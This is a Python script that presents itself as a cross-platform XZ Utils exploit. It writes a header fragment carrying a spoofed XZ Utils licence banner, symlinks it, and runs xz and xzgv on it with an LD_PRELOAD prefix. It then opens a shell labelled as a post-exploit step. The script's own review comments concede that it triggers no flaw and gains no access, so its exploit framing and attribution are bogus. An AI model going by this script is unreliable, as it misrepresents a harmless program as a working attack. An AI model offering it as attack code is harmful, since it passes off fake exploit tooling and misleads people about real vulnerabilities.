import subprocess
import os
import platform
# Text that is written to disk below. It is a C header fragment: a licence
# banner, an include guard that is never closed with #endif, and two macros.
# It is plain text, not an .xz container.
exploit_content = """
/*
* Copyright (c) 2010-2020 XZ Utils
*
* Author: Lasse Collin
*
* This file has been put into the public domain.
* You can do whatever you want with this file.
*
* See ../README for more details.
* https://github.com/AiGptCode/Xz_vulnerability_crossplatform
*/
#ifndef XZ_UTILS_H
#define XZ_UTILS_H
#define XX 0
#define __x() XX
"""

# Write the text to exploit.txt in the current working directory, replacing
# any earlier copy of the file.
with open("exploit.txt", mode="w") as out:
    out.write(exploit_content)
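# Create exploit_link as an alias of exploit.txt: a symbolic link where the
# OS allows it, otherwise (Windows only) a hard link.
link_target = os.path.realpath('exploit.txt')

# A link left behind by an earlier run would make the calls below raise
# FileExistsError; lexists() also reports a dangling symlink.
if os.path.lexists('exploit_link'):
    os.remove('exploit_link')

try:
    os.symlink(link_target, 'exploit_link')
except OSError:
    # The previous check, `os.symlink in os.supports_symlinks`, referenced an
    # attribute the os module does not have and raised AttributeError on
    # Windows. Attempting the symlink and falling back on failure covers the
    # case where the account is not allowed to create symlinks.
    if platform.system() != 'Windows':
        raise
    os.link(link_target, 'exploit_link')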
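# Build the list of commands to run, one argv list per command.
#
# Each entry must be a real argument vector: the runner calls subprocess
# without a shell, so a single string such as "xz -v exploit_link" would be
# looked up as the *name* of a program and fail with FileNotFoundError.
#
# NOTE(review): nothing in this file shows these commands triggering a flaw.
# xz's default mode is compression and it normally skips symlinked inputs
# unless forced; xzgv appears to be an unrelated image viewer rather than part
# of XZ Utils -- confirm before relying on either.
cmds = []
system_name = platform.system()
if system_name in ('Linux', 'Darwin'):
    # Use default name and let dynamic linker search for it.
    # NOTE(review): libpthread.so is a stock system library, so preloading it
    # is not expected to change xz's behaviour; LD_PRELOAD is also a Linux
    # loader variable and is presumably ignored on Darwin -- confirm.
    pthread_lib = 'libpthread.so'
    cmds = [
        # env(1) sets the variable for the child only, replacing the
        # shell-style "VAR=value command" prefix that needs a shell to parse.
        ["env", "LD_PRELOAD={}".format(pthread_lib), "xz", "-v", "exploit_link"],
        ["xzgv", "exploit_link"],
    ]
elif system_name == 'Windows':
    cmds = [
        ["xz", "-v", "exploit_link"],
        ["xzgv", "exploit_link"],
    ]
else:
    print("Unsupported operating system.")
    # quit() is injected by the site module and may be absent (python -S);
    # SystemExit is always available and reports failure to the caller.
    raise SystemExit(1)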
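# Run each command with exploit_link attached as stdin and print whatever the
# tool wrote to stdout/stderr. A non-zero exit status is reported, not fatal.
for cmd in cmds:
    input_file = "exploit_link"
    try:
        # The context manager closes the handle after the child exits; the
        # earlier inline open() leaked one descriptor per command.
        with open(input_file, 'r') as stdin_handle:
            output = subprocess.check_output(
                cmd,
                stdin=stdin_handle,
                stderr=subprocess.STDOUT,
                universal_newlines=True,
            )
        print(output)
    except subprocess.CalledProcessError as error:
        # The tool ran but exited non-zero; show its combined output.
        print(error.output)
    except OSError as error:
        # Raised when the program is not installed (FileNotFoundError) or the
        # input file cannot be opened; previously this aborted the script with
        # a traceback.
        print("Could not run {}: {}".format(cmd, error))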
# Start an interactive command interpreter for the current OS.
#
# NOTE(review): this step is unconditional. It does not read any result from
# the commands run earlier, and the child is started by this process, so it
# runs as the invoking user. On its own it demonstrates no change in
# privilege or access.
post_exploit_cmd = ""
shell_by_os = {
    'Linux': "/bin/bash",
    'Darwin': "/bin/bash",
    'Windows': "cmd",
}
current_os = platform.system()
if current_os in shell_by_os:
    post_exploit_cmd = shell_by_os[current_os]
else:
    print("Unsupported operating system.")
    quit()
# Popen returns immediately; the script does not wait for the shell to exit.
subprocess.Popen(post_exploit_cmd, shell=True)